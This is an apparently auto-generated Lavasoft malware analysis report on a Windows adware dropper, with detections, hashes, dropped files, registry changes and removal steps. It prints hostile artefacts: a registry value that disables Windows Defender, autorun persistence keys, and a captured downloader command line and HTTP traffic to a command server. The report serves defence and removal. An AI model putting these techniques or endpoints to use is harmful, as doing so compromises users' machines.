Dropped.Application.Generic.1683936_4e6248e067
Dropped:Application.Generic.1681992 (BitDefender), not-a-virus:HEUR:AdWare.MSIL.Dotdo.gen (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Adware.Dotdo.93 (DrWeb), Dropped:Application.Generic.1681992 (B) (Emsisoft), Artemis!4E6248E06725 (McAfee), Trojan.Gen.2 (Symantec), PUA.Dotdo (Ikarus), Gen:Variant.Zusy.213000 (FSecure), Win32:Dropper-gen [Drp] (AVG), Win32:Dropper-gen [Drp] (Avast), TROJ_GE.57975A9C (TrendMicro), Dropped:Application.Generic.1683936 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 4e6248e0672534641d4d9a358d90fbe5
SHA1: 0438a66395cfd8efbbf5cd8c0e7af31182bed8e1
SHA256: dc0910d32985e4d79f289d991b14d16d57a38ef6307490664030c09cc380961b
SSDeep: 3072:GgXdZt9P6D3XJXCIwBItOdoewR3kHhhDfrsHXTXQh1:Ge340vCOdVwsxfrsHXTAh1
Size: 144912 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Firseria
Created at: 2009-12-06 00:50:52
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Dropped creates the following process(es):
setupok.exe:3392
%original file name%.exe:2572
ddnow.exe:1304
ddnow.exe:3904
ddnow.exe:3836
ddnow.exe:2648
ddnow.exe:3512
ddnow.exe:2688
ddnow.exe:2952
ddnow.exe:3176
tinstall.exe:2604
The Dropped injects its code into the following process(es):
applica.exe:3732
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process setupok.exe:3392 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Program Files%\applica\applica.exe (12 bytes)
%Program Files%\applica\key.ini (0 bytes)
%Program Files%\applica\uninstall.exe (1030 bytes)
The Dropped deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsjDD17.tmp (0 bytes)
The process %original file name%.exe:2572 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\dnow.exe (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\dnow4.exe (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiCDEB.tmp\SimpleFC.dll (5469 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe (5 bytes)
The Dropped deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\6525587.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nstCDDB.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiCDEB.tmp (0 bytes)
The process ddnow.exe:1304 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:3904 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:3836 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:2648 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:3512 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\aatxtname.txt (12 bytes)
The process ddnow.exe:2688 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:2952 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:3176 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\setupok.exe (61 bytes)
The process tinstall.exe:2604 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\system.ini (16 bytes)
The Dropped deletes the following file(s):
C:\Windows\System32\Tasks\Adobe Flash Player Updater (0 bytes)
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore (0 bytes)
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA (0 bytes)
Registry activity
The process setupok.exe:3392 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Applica]
"DisplayName" = "Applica"
"Publisher" = "Dotdo"
[HKLM\SOFTWARE\idot]
"idot" = "ok"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Applica]
"UninstallString" = "%Program Files%\Applica\uninstall.exe"
To automatically run itself each time Windows is booted, the Dropped adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"
The process %original file name%.exe:2572 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware" = "1"
The process ddnow.exe:3512 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASMANCS]
"ConsoleTracingMask" = "4294901760"
The process tinstall.exe:2604 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"
Dropped PE files
MD5 | File path |
---|---|
d38543fc9ae37d188a23e06ee11d3504 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiCDEB.tmp\SimpleFC.dll |
c5dbd61013cf8146a00f826baee93072 | c:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe |
a3d027a0f8a46f9adb96ab598d02e494 | c:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe |
662c45356fcc64b55f8938e284d0c0d0 | c:\Users\"%CurrentUserName%"\AppData\Local\dnow.exe |
113d1d7b8a9039e6e63034284e35cc99 | c:\Users\"%CurrentUserName%"\AppData\Local\dnow4.exe |
7df9a3a1e913d4a0a444bd49eadf1458 | c:\Users\"%CurrentUserName%"\AppData\Local\setupok.exe |
3a808170b41d2c9a4a434632ea4376ab | c:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe |
6df14af0f2ce3a7db0b21cc265564a3e | c:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
.ndata | 192512 | 94208 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 286720 | 2536 | 2560 | 3.13045 | 8c712c343be341f0c008fe547f2adcd2 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 374
URLs
URL |
---|
hxxp://162.222.193.23/soid1.php?p=&aaaip=581324 |
hxxp://162.222.193.23/goet1.php?p=&pid=&all=&dotnet=yes |
hxxp://162.222.193.23/run1.php?a=flash&b=111 |
hxxp://162.222.193.23/setup200.exe |
hxxp://162.222.193.23/run1.php?a=flash&b=rand |
hxxp://162.222.193.23/run1.php?a=flash&b=setupok.exe - 61865 |
hxxp://162.222.193.23/run1.php?a=flash&b=setupok.exe - 61865 - 1 |
www.rosalesscholarly.pw |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
POST /run1.php?a=flash&b=rand HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
a
HTTP/1.1 200 OK
Date: Wed, 07 Feb 2018 15:33:20 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html.....
POST /goet1.php?p=&pid=&all=&dotnet=yes HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 83
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
;ah4op54qtob;0-$fire-ATSpywaregot--L$cgot-c:\4e6248e0672534641d4d9a358
d90fbe5.exe;0
HTTP/1.1 200 OK
Date: Wed, 07 Feb 2018 15:32:51 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
POST /run1.php?a=flash&b=setupok.exe - 61865 - 1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
a
HTTP/1.1 200 OK
Date: Wed, 07 Feb 2018 15:33:40 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html.....
POST /run1.php?a=flash&b=setupok.exe - 61865 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
a
HTTP/1.1 200 OK
Date: Wed, 07 Feb 2018 15:33:34 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html.....
POST /soid1.php?p=&aaaip=581324 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
aa
HTTP/1.1 200 OK
Date: Wed, 07 Feb 2018 15:32:50 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 12
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html/soi51.p9p?p..
POST /run1.php?a=flash&b=rand HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
a
HTTP/1.1 200 OK
Date: Wed, 07 Feb 2018 15:33:11 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html.....
POST /setup200.exe HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
;
HTTP/1.1 200 OK
Date: Wed, 07 Feb 2018 15:33:07 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Description: File Transfer
Content-Disposition: attachment; filename=
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 61865
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
<<< skipped >>>
POST /run1.php?a=flash&b=111 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
a
HTTP/1.1 200 OK
Date: Wed, 07 Feb 2018 15:32:56 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html.....
The Dropped connects to the servers at the following location(s):
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe "hXXp://162.222.193.23/newc4nT.php" "OK" "C:\Users\"%CurrentUserName%"\AppData\Local\icka6525587.txt"
rs\"%CurrentUserName%"\AppData\Local\run1.txt"
4641d4d9a358d90fbe5.exe;0" "6525587.txt"
C:\Users\"%CurrentUserName%"\AppData\Local\setupok.exe
.tmp\SimpleFC.dll
SID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32
\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiCDEB.tmp\SimpleFC.dll
KWindows
HNetCfg.FwMgr
kernel32.dll
user32.dll
GetKeyboardType
advapi32.dll
oleaut32.dll
GetCPInfo
gdi32.dll
SimpleFC.dll
AddPort
EnableDisablePort
IsPortAdded
IsPortEnabled
RemovePort
C:\Users\"%CurrentUserName%"\AppData\Local\icka6525587.txt
icka6525587.txt
3_0_0_185.ocx
LASH3~1.OCX
rs\"%CurrentUserName%"\AppData\Local\setupok.exe
e6248e0672534641d4d9a358d90fbe5.exe
\Windows\system32\Macromed\Flash\Flash32_23_0_0_185.ocx
c:\%original file name%.exe
C:\Users\"%CurrentUserName%"\AppData\Local
%original file name%.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nstCDDB.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiCDEB.tmp
Windows
setupok.exe - 61865 - 1
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
lash\Flash32_23_0_0_185.ocx
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
setupok.exe:3392
%original file name%.exe:2572
ddnow.exe:1304
ddnow.exe:3904
ddnow.exe:3836
ddnow.exe:2648
ddnow.exe:3512
ddnow.exe:2688
ddnow.exe:2952
ddnow.exe:3176
tinstall.exe:2604
- Delete the original Dropped file.
- Delete or disinfect the following files created/modified by the Dropped:
%Program Files%\applica\applica.exe (12 bytes)
%Program Files%\applica\key.ini (0 bytes)
%Program Files%\applica\uninstall.exe (1030 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\dnow.exe (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\dnow4.exe (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiCDEB.tmp\SimpleFC.dll (5469 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\aatxtname.txt (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\setupok.exe (61 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\system.ini (16 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.